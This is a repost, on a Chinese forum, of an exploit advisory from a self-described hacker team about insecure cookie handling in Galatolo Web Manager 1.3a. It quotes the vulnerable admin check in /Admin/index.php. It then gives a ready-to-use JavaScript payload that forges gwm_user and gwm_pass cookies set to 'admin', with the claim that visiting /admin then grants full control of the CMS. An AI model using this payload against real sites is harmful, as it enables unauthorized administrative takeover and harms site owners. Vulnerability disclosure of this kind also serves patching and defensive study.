• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

    发布者: 山止川行 | 发布时间: 2025-6-28 22:47| 查看数: 56| 评论数: 0|帖子模式

    ############################################################################################
      #                                                                                          #
      #      ...:::::Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability ::::....   #           
      ############################################################################################

    Virangar Security Team

    www.virangar.net
    www.virangar.ir

    --------
    Discoverd By :virangar security team(hadihadi)

    special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

    & all virangar members & all hackerz

    greetz:to my best friend in the world hadi_aryaie2004
    & my lovely friend arash(imm02tal)
    -------
    DESCRIPTION:
    Galatolo Web Manager, suffers from insecure cookie handling, when a admin login is successfull the script creates
    a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
    contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
    logged in as a legit admin.
    ---
    vuln code in /Admin/index.php:

    if (grado($HTTP_COOKIE_VARS["gwm_user"],$HTTP_COOKIE_VARS["gwm_pass"]) == "admin" || grado($HTTP_COOKIE_VARS["gwm_user"],$HTTP_COOKIE_VARS["gwm_pass"]) == "editor" ){
    top();
    menu();
    echo $wellcome_admin;
    foot();
    }

    ---
    exploit:
    javascript:document.cookie = "gwm_user=admin; path=/"; document.cookie = "gwm_pass=admin; path=/";
    -----
    now visit /admin and  you can get admin access and manage the cms ;)
    -------
    young iranian h4ck3rz

    来源:https://www.jb51.net/hack/5682.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表